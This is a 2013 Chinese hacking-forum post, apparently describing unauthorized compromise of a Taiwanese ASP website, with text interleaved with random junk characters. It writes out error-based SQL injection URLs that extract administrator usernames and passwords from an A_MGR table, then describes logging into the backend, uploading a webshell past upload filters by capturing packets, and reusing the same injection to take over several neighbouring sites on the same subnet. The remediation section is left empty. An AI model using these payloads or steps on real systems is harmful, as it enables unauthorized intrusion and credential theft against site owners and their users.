发现一个注入点
9 g/ ?6 `4 O; T$ z4 {http://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833898 u0 w q1 w! N: P( A+ `' S0 ^
1 m3 M4 ?- ?; j! v' X8 Y. M# I习惯性的加’having1=1--! b, D3 ~# I# P
; h7 k5 ~7 i/ p+ Y/ }
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—
! Z n( c1 O( q( T8 ]. U1 B; `8 D' M! E2 m. J6 Z
0
; |5 r/ a0 }7 X3 f+ f! P% c) z) ^) Q
爆出Diary_A.dl_Title(这时候很激动啊); P& v# d# g& S2 I9 t
% l( k/ n+ s8 p# F那么继续7 X9 m; W9 L% `+ R1 H
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—2 D, y# x' T1 C: Q2 p8 t
" p& g9 Q" q E
继续,一直爆下去5 j& A- [3 b0 `& z
7 Z$ B' c) Q# Z# F
爆到几个字段和表段 但是没找到需要的管理用户的字段
4 j$ Q- X, X) N/ [7 T3 g7 {7 f
! ~* ~/ B- Q# ~8 K蛋疼了 怎么办 然后去后台登陆页看源码5 @$ }5 t' X2 y
; P& |- A( b/ M& \+ b. i9 I0" a: m. B) b& f8 ^
( M+ _9 S P. ?. P C- y
Input name= “ADUID”3 A8 Q1 A% x4 n$ s2 J' S* L
Input name= “ADPWD”
% n9 ?, f$ |5 ]! z2 } {5 D
3 P# I1 P6 w' x5 E) B- t很幸运 找到了字段那就继续- {$ ?+ o! Q9 Y9 S! @
找到之后开始爆用户
+ ~1 G* W" E9 U: s+ \2 `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—9 e8 z4 v) s* H; e( |
爆密码
7 ~7 y( z$ f9 zhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—6 ]' ~& C5 V8 V$ g4 W
测试了下 这个注入点只能爆到文章哪里的表
" Q0 R( _6 i/ a
/ i! I. c' z# i o! p头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了# H9 U3 i0 Y {* G9 V) V
) B3 u% ]$ Y2 ~" \0 @$ C
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
& j/ X4 X2 {. V4 ]$ o R, Z( x ]
473
% {4 \7 q% d" R
C5 e* d! \8 x1 d9 [" D进后台+ t; c3 k# v/ ?. I- N* d
6 ~4 T2 p t- u) v
/ b) S' y0 I3 _发现几个上传点 有的地方不能上传 而且防止恶意代码
9 J1 c7 @( O5 c1 G3 ^9 }8 v+ O$ @! z z/ X
没办法 各种百度各种找大牛 找到一只好像可以突破的马
# j, n8 r g6 d8 p; e3 ]
, d' \' X, }- L8 c
. h% r* k4 A4 w. [4 h在系统管理那里直接上传 不过没有显示地址
7 |- x$ R2 Y; D5 n9 k; |* X% z, F8 @1 Y0 \; q0 ?7 }
再上传一次 抓包 搞定OK
, b+ A+ F" R& t: L5 m8 J3 ~1 [% R$ _- e6 X9 u! N7 A Y, J
. l5 w: `( a/ P- s( N/ ~8 R
; s- r) h/ @( ]# B0 z! N( Q472# t8 k& n/ g' Q
( D( f2 R" E3 E
晚上不行了 去睡觉。。。1 R/ y3 G, W, n& M0 N* D1 u/ s
第二天刚起床 闲的没事做继续日站吧 ! m6 ^& j6 I& }+ O+ a. D" O
. o- ~& o: Z0 H h) e+ ^找个站 就把这个站的旁c扫了下9 ]3 b7 q$ Z, x- d
3 a) }& }* V3 g/ `, A3 K& X* p发现c段也有一个购物站 ,然后还和这个站的模板差不多; E8 X3 i6 u- H4 e1 Y/ {
, q; u5 a. m( G# n: g3 \4 m
就找到会员登录口测试
7 U" s5 g3 F6 p" W2 D7 {' P d# u* {( Y1 h
'and (select top 1 MGR_UID from A_MGR)>0—
; M, e/ t. l6 s9 l果断爆到了 这时候我很激动 通杀) A* T3 x: u( @' |- s. ^
$ u; f) E; d! A( I# ^% m: ~ ~% X再次翻c段
$ H" h- w6 a. d4 _5 N# l
. d/ }. b2 E7 v. H/ V3 S翻出几个站 都成功拿下
: ^5 N8 P* t6 ]
. l3 F c6 U: Q: @) P, V1 B9 }( E/ R5 H M! ]/ @6 d( y4 K
. |& z' Z4 i. ^修复方案:0 y& Y4 x) R" ]
他们比我专业
4 ^' o& o2 e- y0 c( O. d1 b) ?3 p. i6 {8 V& Y# O3 v
3 W# H, d- b- }& M
. R1 L; O& V) Y |
发表于 2013-4-4 17:40:38
收藏
支持
反对